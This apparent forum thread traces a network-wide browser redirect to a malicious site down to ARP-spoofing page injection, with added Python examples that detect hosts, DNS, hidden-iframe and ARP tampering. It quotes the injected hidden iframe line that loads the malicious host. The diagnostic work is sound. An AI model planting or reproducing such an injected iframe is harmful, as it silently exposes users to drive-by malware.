ammexit
Attempting to go to Windows Update fails and freezes IE. Something to do with 791224.com (DON'T GO THERE); it will do to your PC whatever it's done to my network.

So here's the layout.  I was viewing our real time web monitoring software and noticed a large number of users going to 791224.com.  Thinking that was strange I googled the site address and saw that Google says "This site may harm your PC".  I walked over to the desk of a few people that were accessing the site but saw that they weren't (on the surface) viewing any sites out of the ordinary.  I put my own user account on the web monitoring software and went to a few sites at random.  The monitoring software showed access to those sites as well as 791224.com.  The only problem I can see it causing at this moment is it completely blocks my ability to get to the Windows Update site.  When I try it simply displays two little boxes in the top left corner and IE freezes up until I end task.  I've called Microsoft, but they say they do not have anything documented for this.  I've scanned with antivirus software that says it successfully cleaned the trojans, then I do a rescan which shows no virus found.  The behavior of continually hitting the suspect URL still persists.  I also noticed that it only occurs when a user is surfing the web.  If they close IE, they can work on their PC without a hitch.

Have you heard of this?  I can't find much on Google.  Most of the results shown are in Chinese.

It's affecting users on 2003 Terminal Servers, XP Pro, Vista and 2000.
cohenphil

Sounds like some nasty malware/spyware that is linked into IE.
I suggest downloading and running the free version of Ad-Aware (http://www.lavasoft.com/single/trialpay.php); just click the top download link to get the free version. Also grab a copy of Spybot Search and Destroy (http://safer-networking.org/en/index.html), as I tend to find they both pick up different things. Running AV is great but they don't find the malware/spyware very well.

Have you checked your hosts file to see if it's been modified so your MS updates get redirected (c:\windows\system32\drivers\etc)? Open the hosts file with Notepad.

Also try launching IE in safe mode and see if you still notice the same things happening.
Run from the cmd prompt a "netstat -ano"; this will list the processes that are linked to the network activity. Check your Task Manager and turn on the PID column and see if you can match it up to a strange file or service that's running.

It also would help to grab a HijackThis log of one of the systems affected.
Let me know how you go with this,  

Cheers,
Phil
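
As an added example (not from this thread or from any tool it mentions), here is the hosts-file check and the netstat -ano / PID matching Phil describes, written in Python over constructed sample output so it runs offline. The hosts entries, the netstat and tasklist listings, the process names and the suspect address 198.51.100.7 are all made up for the example; on a real box you would feed it the contents of the hosts file and the output of netstat -ano and tasklist.

```python
"""Added example: hosts-file check plus a netstat -ano <-> tasklist PID join.
All sample data below is constructed; nothing here comes from the thread."""
import ipaddress
import re

# Constructed hosts file: a normal loopback line plus two entries of the kind
# malware adds to keep a machine from reaching update/AV vendor sites.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2006 Microsoft Corp.
127.0.0.1       localhost
::1             localhost

0.0.0.0         update.microsoft.com
198.51.100.7    www.kaspersky.com
"""

def parse_hosts(text):
    """Return (ip, hostname) pairs, ignoring comments and blank lines."""
    pairs = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        ip, *names = line.split()
        pairs.extend((ip, n.lower()) for n in names)
    return pairs

def suspicious_hosts_entries(text):
    """Hosts entries other than localhost -> loopback. Mapping a vendor name
    to 0.0.0.0 or to some other box is how malware blocks patching."""
    flagged = []
    for ip, name in parse_hosts(text):
        try:
            addr = ipaddress.ip_address(ip)
        except ValueError:
            flagged.append((ip, name))      # not even an IP: look at it
            continue
        if not (addr.is_loopback and name == "localhost"):
            flagged.append((ip, name))
    return flagged

# Constructed `netstat -ano` and `tasklist` output in Windows' column layout.
SAMPLE_NETSTAT = """\

Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       884
  TCP    192.168.1.20:1045      198.51.100.7:80        ESTABLISHED     2716
  TCP    192.168.1.20:1046      157.166.255.18:80      ESTABLISHED     2716
  TCP    192.168.1.20:1047      198.51.100.7:80        SYN_SENT        3320
  UDP    0.0.0.0:500            *:*                                    1204
"""
SAMPLE_TASKLIST = """\

Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
svchost.exe                    884 Console                    0      5,112 K
lsass.exe                     1204 Console                    0      1,980 K
iexplore.exe                  2716 Console                    0     31,004 K
wuauclt.exe                   3320 Console                    0      3,520 K
"""

NETSTAT_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)\s+(?:(\S+)\s+)?(\d+)\s*$")
TASKLIST_RE = re.compile(r"^(\S+)\s+(\d+)\s+\S+\s+\d+\s+[\d,]+ K\s*$")

def parse_netstat(text):
    """One dict per connection line; UDP lines have no state column."""
    conns = []
    for line in text.splitlines():
        m = NETSTAT_RE.match(line)
        if m:
            proto, local, foreign, state, pid = m.groups()
            conns.append({"proto": proto, "local": local, "foreign": foreign,
                          "state": state or "", "pid": int(pid)})
    return conns

def parse_tasklist(text):
    """Map PID -> image name."""
    return {int(m.group(2)): m.group(1)
            for m in map(TASKLIST_RE.match, text.splitlines()) if m}

def connections_to(suspect_ip, netstat_text, tasklist_text):
    """Every connection whose foreign address is suspect_ip, joined to the
    owning process. A PID with no tasklist entry is reported as <unknown>
    rather than dropped: a process that hides from tasklist is a finding."""
    procs = parse_tasklist(tasklist_text)
    hits = []
    for c in parse_netstat(netstat_text):
        if c["foreign"].rsplit(":", 1)[0] == suspect_ip:
            hits.append((c["pid"], procs.get(c["pid"], "<unknown>"),
                         c["local"], c["foreign"], c["state"]))
    return hits

if __name__ == "__main__":
    for entry in suspicious_hosts_entries(SAMPLE_HOSTS):
        print("hosts: review", entry)
    for pid, name, local, foreign, state in connections_to(
            "198.51.100.7", SAMPLE_NETSTAT, SAMPLE_TASKLIST):
        print(f"netstat: pid {pid} ({name}) {local} -> {foreign} {state}")
```

One caveat the rest of this thread bears out: a clean hosts file and an ordinary-looking process list do not rule out a redirect, because this join only sees what the local machine's own TCP/IP stack sends. If the injection happens on the wire, the PID that owns the connection to the bad host is simply the browser.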

ammexit (asker)
Thanks Phil!

I'll get started on your suggestions right now and repost the results.  I've tried a few other spyware scanners but haven't had any luck.  I'll try yours now.
ammexit (asker)
Hosts file looked fine.

Checked the PID and went over the services but everything looked normal.

I'm about 1/3 of the way through the spyware scan with Search and Destroy.  As soon as it's done I'll scan with the other one you suggested.

Tomorrow I'll try safe mode.

Say goodbye to my weekend!
younghv
We can get a much better look at what is running on your computer if you run "HiJack This" (HJT) and post the log file.

Instructions below are copied from the post of one of our MalWare Experts (IndiGenus):

It would help if we could see what was going on with your computer. I suggest that you download, run, and upload a HijackThis log from the link below.

http://www.trendsecure.com/portal/en-US/threat_analytics/HJTInstall.exe

Click on "Do a system scan and save a log file" button. Post the text from the log file. Do not have HJT fix anything at this point.

Please do not post the log into the comment window. Use "Attach File" under the comment window to post the log.

Once we can examine the processes running, a complete removal plan can be created.

AV and Anti-spyware scans are not going to fix this problem.

Post back when you can.

Vic
ammexit (asker)
Thank you for your response. I ran HijackThis and I'm attaching the log file like you requested.  Like you said, so far the spyware and virus scans haven't solved the problem.  I ran sysclean until it said no viruses found, but the problem remains.

I have many machines that are infected, but this log is from a 2003 Terminal Server.

Thanks for your help!!!
hijackthis.log
Hi,
I don't review HJT logs from many servers but I'm not seeing anything malicious there. Can you also post a HJT log from one or two of the suspect clients to see if there is anything local to the machine?

Dave
ammexit (asker)
Yes, my Vista machine is infected as well.  Give me 5 minutes.
ammexit (asker)
Here's the log file you requested.
hijackthis.log
Not seeing anything bad there either. I suggest running a full scan with Kaspersky to see if anything is found. Kaspersky is good, it won't fix anything by itself but is very thorough. You could upload the log it produces, just make sure to save it at the end.

Using Internet Explorer, run Kaspersky Online Scanner  
http://www.kaspersky.com/virusscanner
    * Click 'Accept' in the window that pops up.
    * You will be prompted to install an ActiveX component from Kaspersky, Click on the information bar and select Install ActiveX Control if so. This may happen more than once. That is OK. You also may get a warning from your Windows Firewall. You can tell it to unblock.
    * The program will launch and then start to download the latest definition files.
    * Once the scanner is installed and the definitions downloaded, click 'Next'.
    * Now click on 'Scan Settings'
    * In the scan settings make sure that the following are selected:
          o Scan using the following Anti-Virus database: 'Extended' (If available, otherwise 'Standard')
          o Scan Options: 'Scan Archives' and 'Scan Mail Bases'
    * Click 'OK'
    * Now under 'Select a target to scan' select 'My Computer'
    * The scan will take a while, so be patient and let it run. Once the scan is complete, it will display whether your system has been infected.
    * Now click on the 'Save Report As...' button:
    * Make sure it says Save as a text file - change it if not
    * Save the file to your desktop.
Upload the file for review.

ammexit (asker)
Okay, I have it scanning now.  As soon as it's done I'll post the results.
ammexit (asker)
Also, I ran the two spyware tools listed earlier in the post.  They did find and remove instances, but the PC is still having the same behavior.
ammexit (asker)
Here is the Kaspersky scan result.  It responded with:

Scan complete.
No malware has been detected. The sections that have been scanned are clean.
Kaspersky-Results.txt
Well this sure is an interesting one. I found a link to a thread over at Geeks2Go where the user ran Panda Active Scan and it appeared to solve the issue.
http://www.geekstogo.com/forum/Trojan-browser-hijacker-791224-com-t186733.html

I would recommend you try running it and see if it helps. It is unusual for Kaspersky to miss much...

http://www.pandasoftware.com/activescan/com/activescan_principal.htm
ammexit (asker)
You bet it is!  I've done so many different scans that all say the system is clean.  But sure enough something is making it go to that malicious site.  I even tried installing Firefox to see if it was strictly an IE bug.  Firefox gets redirected to the site as well.

I saw that Geekstogo post also, but it seems that Kaspersky was their solution.  I'll try the Panda scan.  So do you think I should just keep trying different scanning software?  I'm losing hope there just because I've done so many so far.

Microsoft suggested I call Trend Micro and have them custom design me a pattern file specifically for this.

Seems strange that I've been infected with malicious software that literally has no MS patch, no pattern file that recognizes it and no experiences from others (excluding the one).  I don't like being the first on this one!

I'm open to any suggestions you can think of.  One more bit of info for you.  I tried logging into our new file server.  NO ONE has done any web surfing from this machine of course.  It has the latest Windows Updates as of 4 days ago.  It has the same problem as all the others.  It's as if a worm has spread across the network.  Although the behavior it exhibits smells like a Trojan.

Thanks.
Quote from G2G thread...

>""I ran a Panda ActiveScan through system and it seemed to fix the problem.""<

Even though the Panda scan didn't even appear to fix anything ... :scratches head:?

The Kaspersky online scanner will not fix anything it finds. Which doesn't matter as your case didn't find anything any way. Most of the stuff on that site appears to be Chinese....

I would at least give the Panda ActiveScan a shot.

Also, let's get a little deeper scan also with DSS.

Download Deckard's System Scanner (DSS) and save it to your Desktop.

http://www.techsupportforum.com/sectools/Deckard/dss.exe

Close all other windows before proceeding.
Double-click on dss.exe and follow the prompts.
When it has finished, dss will open two Notepads. main.txt and extra.txt  --  Please upload the logs
Dave - I've been lurking here watching the posts.
I remember several years ago that the bad guys were targeting routers and other network devices. Have you seen any of that lately?
I also wonder if this can be some kind of DNS/other problem up the line from the workstations.

ammexit - you said that your HOSTS file looked fine, but has it been modified in any way?

Vic
I agree Vic. While I have not seen anything like that, I have been thinking along the same lines here. Might be a good idea to just go ahead and reset the HOSTS file also, just to make sure.

HostsXpert will reset the hosts file. It has many other useful functions too...
http://www.funkytoad.com/content/view/13/31/
ammexit (asker)
Hey Guys,

The hosts file looked fine to me.  I didn't see any adjustments at all.  I can go ahead and reset them anyway.

Most of our users go through our ISA for browsing.  I thought that might be the offender, but the problem persists even if I bypass the ISA and go straight out our firewall (Watchguard Firebox).
Hey Ammexit, sorry for the delay in getting back to you; I've been working.

When you check your hosts file again, can you do me a favour and see if you can scroll down in the hosts file? Sometimes things are hidden at the bottom.

You said you're running ISA, so are you also running your own internal DNS?
What could have happened if you're running your own DNS is that you may have had some malicious replication. Can you expand your DNS entries to make sure that there aren't any records or pointers overwriting the usual lookups?
One way to test this is to do an nslookup from a cmd prompt for "update.microsoft.com" and advise what is returned. It should look something like this.

Non-authoritative answer:
Name:    www.update.microsoft.com.nsatc.net
Address:  207.46.209.124
Aliases:  update.microsoft.com, update.microsoft.com.nsatc.net
          www.update.microsoft.com

Can you also give me a copy of the netstat -ano when you have IE or Firefox open?
I'd also like you to grab a copy of Process Explorer (http://technet.microsoft.com/en-us/sysinternals/bb896653.aspx) so we can take a closer look at what's actually being called and run when you launch IE or Firefox, mainly DLLs. You can expand the IE process and see exactly what it has linked to its process and kill them off to try and find the cause of the traffic redirection.

Let me know how you go with all these, in the meantime i'll take a look at your HijackThis logs.
Cheers,
Phil
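
An added example, not from the thread: parsing nslookup output in the format Phil shows and comparing the answer from the domain controller against the answer from a public resolver, so a poisoned internal zone stands out. The three transcripts are constructed (the resolver host names, the DC address 192.168.1.10 and the poisoned answer 192.168.1.77 are assumptions); the two Microsoft addresses are the ones that appear in this thread.

```python
"""Added example: compare nslookup answers for one name from two resolvers
and flag answers that point into non-public address space. Transcripts are
constructed in Windows nslookup's layout; resolver names and the poisoned
address 192.168.1.77 are assumptions for the example."""
import ipaddress

INTERNAL_DC = """\
Server:  dc1.corp.example
Address:  192.168.1.10

Non-authoritative answer:
Name:    www.update.microsoft.com.nsatc.net
Address:  207.46.211.122
Aliases:  update.microsoft.com, update.microsoft.com.nsatc.net
          www.update.microsoft.com
"""

PUBLIC_RESOLVER = """\
Server:  vnsc-bak.sys.gtei.net
Address:  4.2.2.2

Non-authoritative answer:
Name:    www.update.microsoft.com.nsatc.net
Address:  207.46.209.124
Aliases:  update.microsoft.com, update.microsoft.com.nsatc.net
          www.update.microsoft.com
"""

# What a tampered internal zone would hand back: the update host name
# resolves to a box on the LAN.
POISONED = """\
Server:  dc1.corp.example
Address:  192.168.1.10

Name:    update.microsoft.com
Address:  192.168.1.77
"""

def _ip(token):
    try:
        return ipaddress.ip_address(token)
    except ValueError:
        return None

def _names(field):
    return {n.strip().lower() for n in field.split(",") if n.strip()}

def parse_nslookup(text):
    """Return (resolver_ip, canonical_name, {answer ips}, {aliases}).
    The Address: line right after Server: is the resolver, not an answer."""
    resolver, name, addrs, aliases = None, None, set(), set()
    section, last = "server", None
    for raw in text.splitlines():
        if not raw.strip():
            continue
        if raw.startswith("Server:"):
            section = "server"
        elif raw.startswith("Name:"):
            name = raw.split(":", 1)[1].strip().lower()
            section, last = "answer", "addr"
        elif raw.startswith("Aliases:"):
            aliases |= _names(raw.split(":", 1)[1])
            last = "aliases"
        elif raw.startswith("Address"):          # Address: / Addresses:
            ip = _ip(raw.split(":", 1)[1].strip())
            if section == "server":
                resolver = ip
            elif ip:
                addrs.add(ip)
                last = "addr"
        elif raw[0].isspace():                   # continuation line
            if last == "aliases":
                aliases |= _names(raw)
            elif _ip(raw.strip()):
                addrs.add(_ip(raw.strip()))
    return resolver, name, addrs, aliases

def compare_answers(expected_name, *transcripts):
    """Findings across resolvers. Different public addresses alone are only
    noted, because CDNs and round-robin legitimately return different ones.
    An answer outside globally routable space, or an answer for a name other
    than the one asked for, is the signal worth acting on."""
    findings = []
    answers = [parse_nslookup(t) for t in transcripts]
    for resolver, name, addrs, aliases in answers:
        for a in addrs:
            if not a.is_global:
                findings.append(f"{resolver}: {expected_name} -> {a} is not a public address")
        if name != expected_name and expected_name not in aliases:
            findings.append(f"{resolver}: answer is for {name}, not {expected_name}")
    sets = [a[2] for a in answers]
    if len(sets) > 1 and not set.intersection(*sets):
        findings.append("resolvers returned disjoint address sets; check ownership (whois) before calling it tampering")
    return findings

if __name__ == "__main__":
    for f in compare_answers("update.microsoft.com", INTERNAL_DC, PUBLIC_RESOLVER):
        print("legit:", f)
    for f in compare_answers("update.microsoft.com", POISONED):
        print("poisoned:", f)
```

Getting two different public addresses from two resolvers is exactly what happens later in this thread (207.46.211.122 from the DC, 207.46.209.124 in Phil's sample) and is not by itself evidence of tampering; an answer in RFC 1918 or loopback space for a public name is.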
ammexit (asker)
This is good stuff, thanks Phil.  I'll do all your suggestions above and repost the results tonight, ASAP.

As for you DNS question.  Our domain controllers are setup with DNS forwarders to send all DNS requests that they cannot answer on to our ISP.

Thanks again.
Please check your DC's DNS entries to make sure there isn't anything crazy happening.
I'd also like you to use CCleaner to completely clean out your Temp internet files (inc. content.ie5 and index.dat files): http://www.ccleaner.com/download/

Once they are cleaned out, let me know if you still get the same issue.
Cheers,
Phil
Whilst I'm in the mood for posting, have you tried bypassing your proxy server?
ammexit (asker)
Hi cohenphil,

I'll check my DC's DNS.  I'll also try going to a client and using a static IP of 4.2.2.2 for the DNS to see how it reacts.  I've cleaned out the internet files the traditional way, but I'll try your tool too.

Yes, my ISA server is acting as the proxy and I get the same results when I bypass it.

Thanks!
ammexit (asker)
Hi Guys,

Here's some of the progress.

1.  I've double checked the hosts file and there are no discrepancies.

2.  I tried changing my client DNS from our DC's to 4.2.2.2.  The issue still exists.

3.  I did an nslookup to update.microsoft.com.  Here is what came back:

Non-authoritative answer:
Name:     www.update.microsoft.com.nsatc.net
Address:     207.46.211.122
Aliases:     update.microsoft.com, update.microsoft.com.nsatc.net, www.update.microsoft.com

Something to take note of is, while update.microsoft.com doesn't work at all for me, I still see the hits to 791224.com when I'm browsing other sites.  For example, if I go to cnn.com.  Then go over to ISA and view the real-time monitor, I'll see multiple hits to 791224.com amidst the cnn.com hits.

I'm continuing with your other suggestions now and will repost shortly.
ammexit (asker)
Here's the netstat -ano with IE open
netstat--ano.txt
ammexit (asker)
Phil,

Here are the results from Process Explorer.
Results-from-Process-Explorer.txt
ammexit (asker)
Phil,

I just ran ccleaner.  The issue is still there.
ammexit,
Random thoughts.
Do you have a notebook computer displaying these symptoms?
If so, take it to another environment (home?) and see if it is still being misdirected.

For me, MS updates resolves to 64.4.21.91 - can you browse to that IP in your Web Browser?

When you TRACERT/PING/NSLOOKUP "207.46.211.122" what does it resolve to?

When you TRACERT/PING/NSLOOKUP "64.4.21.91", what does it resolve to?

Vic
ammexit (asker)
Vic,

You read my mind.  I just got back from the office with my PC when I read your post.  So, all the tests I was doing were from this PC.  Now with it in my home environment it is able to connect to update.microsoft.com just fine!

So I'm thinking I need to really dig deep into my domain controllers.  Do you agree?

Maybe I'm wrong, but I'm thinking that when I gave my PC a static DNS of 4.2.2.2 it would not have used the DC's for DNS and would have been able to access update.microsoft.com just fine, if my DC's are in fact causing the problem.  Would you agree with that?

I'll log in and play with the nslookups now.

Thanks.
Sorry for the delay - I had grandson duty for the past several hours.

Based on what you just posted, I would say that it has to be some kind of configuration problem - either your DC's or a router someplace. If your laptop works fine from home, there has to be something on/in the work network that is misdirecting it.

There was a time when I could probably have given you real advice, but I'm retired and haven't played on a real network for about 3 years.

If one of these other guys can help with that great - otherwise, you can post another question in the Network/Server/Router Zones detailing what you've learned so far.

I'll probably stand back and just watch, but I'll be rooting for you.

Vic
ammexit (asker)
I've been troubleshooting the two DC's for the last couple hours.  Strange thing is this problem just showed its ugly face this last Friday, but the configs on the DC's and my router/firewall haven't been touched.

Also, if it is a config problem, it's strange that the only website that won't load is Windows Update.  And why would a config problem point me to 791224.com, which just so happens to be a malicious site?

I'm just thinking out loud.  At least my PC is fine when I pull it out of the environment.  It's a start!!!

Thanks Vic.
ammexit (asker)
Hey Guys,

Something to take note of.  So remember my office PC that kept hitting 791224.com no longer does this now that I've brought it home.  Now I logged into one of our Terminal Servers back at the office to check the source of a webpage, I did cnn.com.  The first line of the source reads

<iframe src=http://791224.com/ width=0 height=0 frameborder=0></iframe>

I did the same thing on my office PC that I brought home; it doesn't add that line to the source.  Strange that something in the network is adding that code to any webpage accessed by any PC in the network.  But those same PC's can be yanked out of that environment and be back to business as usual.

Something in the network is throwing in that line of code!!!

Can anyone make sense of this?  I'm attaching the Source from the CNN site.

Looking forward to your feedback.
www.cnn-1-.txt
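
An added example, not part of the thread: the check ammexit did by hand (view source, look for the hidden frame) done over captured page source in Python, so it can be repeated for every page and every client, plus a diff of a copy fetched from outside the network against a copy fetched from inside. The HTML is constructed; the only string taken from the thread is the injected iframe line quoted above, and www.example.com is a placeholder for the site being fetched.

```python
"""Added example: find invisible iframes in saved page source and diff a copy
fetched through the suspect network against one fetched from outside.
The HTML below is constructed; the only string taken from the thread is the
injected iframe line ammexit quoted."""
import difflib
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed "clean" page as fetched from outside the affected network.
# It deliberately contains a same-origin hidden iframe, which is common and
# should not be reported as an injection.
CLEAN_PAGE = """\
<html>
<head><title>Sample news page</title></head>
<body>
<h1>Headlines</h1>
<iframe src="http://www.example.com/metrics.html" style="display: none"></iframe>
<iframe src="/ads/frame.html" width="300" height="250"></iframe>
</body>
</html>
"""

# The same page as fetched from inside: the line from the thread is
# prepended, which is where ammexit found it in the CNN source.
INSIDE_PAGE = ("<iframe src=http://791224.com/ width=0 height=0 frameborder=0></iframe>\n"
               + CLEAN_PAGE)

class _IframeCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})

def _is_zero(value):
    v = (value or "").strip().lower()
    if v.endswith("px"):
        v = v[:-2]
    try:
        return float(v) == 0
    except ValueError:
        return False

def hidden_iframes(html):
    """src of every iframe sized to be invisible or styled out of view."""
    p = _IframeCollector()
    p.feed(html)
    out = []
    for a in p.iframes:
        style = a.get("style", "").replace(" ", "").lower()
        if (_is_zero(a.get("width")) or _is_zero(a.get("height"))
                or "display:none" in style or "visibility:hidden" in style):
            out.append(a.get("src", ""))
    return out

def foreign_hidden_iframes(html, page_host):
    """Hidden iframes pulling content from a host other than the page's own.
    Relative or same-host srcs are skipped; a hidden frame to a third-party
    host is the drive-by pattern."""
    found = []
    for src in hidden_iframes(html):
        host = (urlsplit(src).hostname or "").lower()
        if host and host != page_host.lower():
            found.append(src)
    return found

def injected_lines(outside_html, inside_html):
    """Lines present only in the copy fetched through the suspect path."""
    diff = difflib.unified_diff(outside_html.splitlines(),
                                inside_html.splitlines(), lineterm="", n=0)
    return [l[1:] for l in diff if l.startswith("+") and not l.startswith("+++")]

if __name__ == "__main__":
    print("foreign hidden iframes:", foreign_hidden_iframes(INSIDE_PAGE, "www.example.com"))
    print("injected lines:", injected_lines(CLEAN_PAGE, INSIDE_PAGE))
```

Fetching the same URL from inside and from outside the network and diffing the two copies is the cleanest way to prove an on-path injector: if the site itself had been compromised server-side, the iframe would appear in both copies.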
ammexit (asker)
I'm thinking a machine is doing some ARP spoofing in the network.
ammexit (asker)
Here's an update for those who may encounter this issue.

To find the infected PC I shut down all the clients and first confirmed that the redirecting behavior was no longer taking place, which it wasn't.  Then I went down the list and powered on individual PC's one at a time and checked to see if the malicious activity had returned after they booted up.  Strangely enough, the behavior never returned.

It's not clear to me what took place.  I'm working to make sense of it now.  I don't know of any ARP spoofing virus that is resolved by rebooting so I'm not sleeping well yet.

I also noticed from Googling the malicious URL that others are starting to have a similar issue.

More to come.
By chance do you have a wireless network in your environment? A rogue AP? A machine with peer wireless enabled? These could all be used as an entrance point for the ARP spoofing and the MITM (man in the middle).

Keep an eye on your logs, grab a copy of ethereal so we can monitor the packets on the lan and see where it's coming from.

Look forward to hearing your update.
Cheers,
Phil
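
An added example, not from the thread: two ways to confirm the ARP spoofing ammexit suspects, which is also what Phil's packet-capture suggestion would show, written in Python over constructed data. The arp -a table, the ARP reply records, the MAC addresses and the gateway address 192.168.1.1 are all invented for the example; the known-good gateway MAC would be read from the router itself.

```python
"""Added example: two ways to spot ARP poisoning from data you already have.
1. `arp -a` on a client: one MAC answering for the gateway AND another host.
2. ARP replies exported from an Ethereal/Wireshark capture: the gateway IP
   claimed by a MAC other than its known-good one, or any IP whose MAC flips.
The table, capture records, MACs and addresses are all constructed."""
import re
from collections import defaultdict

# Constructed `arp -a` output (Windows layout). 192.168.1.1 is the gateway;
# the same MAC also appears for 192.168.1.77, the poisoner's real address.
ARP_A_SAMPLE = """\
Interface: 192.168.1.20 --- 0x2
  Internet Address      Physical Address      Type
  192.168.1.1           00-11-22-33-44-55     dynamic
  192.168.1.10          00-1a-a0-12-34-56     dynamic
  192.168.1.77          00-11-22-33-44-55     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
"""

# Constructed ARP records (frame time, opcode, sender IP, sender MAC) as
# they might be exported from a capture on the LAN segment.
ARP_RECORDS = [
    (0.00, "reply",   "192.168.1.1",  "00:0c:29:aa:bb:cc"),
    (0.40, "request", "192.168.1.20", "00:50:56:11:22:33"),
    (1.50, "reply",   "192.168.1.1",  "00:11:22:33:44:55"),
    (2.00, "reply",   "192.168.1.10", "00:1a:a0:12:34:56"),
    (2.50, "reply",   "192.168.1.10", "00:11:22:33:44:55"),
    (3.00, "reply",   "192.168.1.1",  "00:11:22:33:44:55"),
]

# Known-good MAC of the gateway, as read off the router itself (assumed).
BASELINE = {"192.168.1.1": "00:0c:29:aa:bb:cc"}

ARP_LINE = re.compile(
    r"^\s*(\d+\.\d+\.\d+\.\d+)\s+([0-9a-fA-F]{2}(?:[-:][0-9a-fA-F]{2}){5})\s+(\w+)")

def norm_mac(mac):
    return mac.lower().replace("-", ":")

def parse_arp_a(text):
    """Map IP -> (mac, type) from `arp -a` output."""
    table = {}
    for line in text.splitlines():
        m = ARP_LINE.match(line)
        if m:
            ip, mac, kind = m.groups()
            table[ip] = (norm_mac(mac), kind)
    return table

def duplicate_macs(table):
    """{mac: [ips]} for unicast MACs that answer for more than one IP.
    Broadcast/multicast entries (low bit of the first octet set) are skipped."""
    by_mac = defaultdict(list)
    for ip, (mac, _kind) in table.items():
        if int(mac[:2], 16) & 1:
            continue
        by_mac[mac].append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}

def gateway_impersonators(table, gateway_ip):
    """Other IPs sharing the gateway's MAC. A router legitimately owning
    several IPs is possible, so confirm against its real MAC before acting."""
    gw_mac = table.get(gateway_ip, ("", ""))[0]
    return [ip for ip in duplicate_macs(table).get(gw_mac, []) if ip != gateway_ip]

def arp_alerts(records, baseline):
    """Walk ARP replies in time order and report poisoning signals."""
    seen, alerts = {}, []
    for t, op, ip, mac in sorted(records):
        if op != "reply":
            continue
        mac = norm_mac(mac)
        if ip in baseline and mac != norm_mac(baseline[ip]):
            alerts.append((t, ip, f"claimed by {mac}, expected {norm_mac(baseline[ip])}"))
        elif ip in seen and seen[ip] != mac:
            alerts.append((t, ip, f"MAC changed from {seen[ip]} to {mac}"))
        seen[ip] = mac
    return alerts

if __name__ == "__main__":
    table = parse_arp_a(ARP_A_SAMPLE)
    print("hosts sharing the gateway MAC:", gateway_impersonators(table, "192.168.1.1"))
    for alert in arp_alerts(ARP_RECORDS, BASELINE):
        print("ARP alert at t=%.2f for %s: %s" % alert)
```

Dynamic ARP entries age out, and a poisoner that stops sending (or gets rebooted) leaves nothing behind in the cache, so the arp -a table and the capture have to be collected while the symptom is present; that is consistent with the behaviour vanishing after the power-cycle described above. Longer term the usual controls are static ARP entries for the gateway on critical hosts and dynamic ARP inspection with DHCP snooping on managed switches.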
Whilst I'm at it, can you please remember to run Windows Updates on all your machines while it's working!!
ammexit (asker)
I have my WSUS Server pushing them out as we speak : )
ammexit (asker)
Hey Phil,

Sorry, I didn't see your other post.  No, I don't have any wireless access setup.
ASKER CERTIFIED SOLUTION
kkick5742

This solution is only available to members.
ammexit (asker)
Thanks.  Everything's been stable for the last few days.  I checked the ISA Server and we haven't had a single hit to the malicious site.

I'll keep my eye out for it!
kkick5742 - the fix for the malware you are describing has been out since last year. All of the major AV applications (even Symantec) will automatically clean that - no need for anyone to fool around with changing their current AV/anti-malware solutions.